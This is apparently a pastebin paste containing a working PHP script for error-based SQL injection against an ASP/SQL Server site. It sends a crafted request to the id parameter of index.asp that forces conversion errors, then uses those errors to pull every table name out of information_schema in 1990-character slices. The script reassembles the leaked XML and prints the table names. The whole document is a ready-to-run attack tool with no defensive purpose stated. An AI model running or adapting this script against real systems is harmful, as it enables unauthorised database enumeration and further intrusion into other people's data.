Untitled

a guest May 10th, 2010 299 Never
<?php

$host = "www.test.net";
$port = 80;
$xml  = '';   // accumulates the XML fragments recovered from the error pages

// Each pass requests the next 1990-character slice of the FOR XML RAW output.
for($i=$j=0;;$i+=1990,$j++) {
    // convert(int, <string>) makes SQL Server raise a conversion error that quotes the string.
    $p = "GET /index.asp?id=1'".urlencode(" and 1= (SELECT convert(int,SUBSTRING((SELECT TABLE_NAME AS e FROM information_schema.TABLES FOR XML RAW ('a')),$i,1990)))--")." HTTP/1.0\r\n";
    $p.= "Host: $host\r\n";
    $p.= "Connection: close\r\n\r\n";

    $ock = fsockopen(gethostbyname($host), $port);
    if(!$ock) {
        return false;
    }
    fputs($ock, $p);
    $html='';
    while(!feof($ock)) {
        $html.= fgets($ock);
    }
    fclose($ock);
    // Separate the response headers from the body.
    $html = explode("\r\n\r\n",$html);
    if(stripos($html[1],'type mismatch')!==false) {
        break;
    }
    // Pull the quoted string out of the conversion error message in the page body.
    $out = array();
    preg_match("@the nvarchar value '(.+?)'*( to data type int\.)*</font>@", $html[1], $out);
    if(isset($out[1])) {
        $xml .= htmlspecialchars_decode($out[1]);
    } else {
        break;
    }

}

// Parse the collected <a e="..."/> rows and print each E attribute (the table name).
$r = xml_parser_create();
$out = array();
xml_parse_into_struct($r, '<root>'.$xml, $out);
foreach($out as $el) {
    // The wrapping <root> element has no attributes; skip it.
    if(isset($el['attributes']['E'])) {
        echo $el['attributes']['E']."\r\n";
    }
}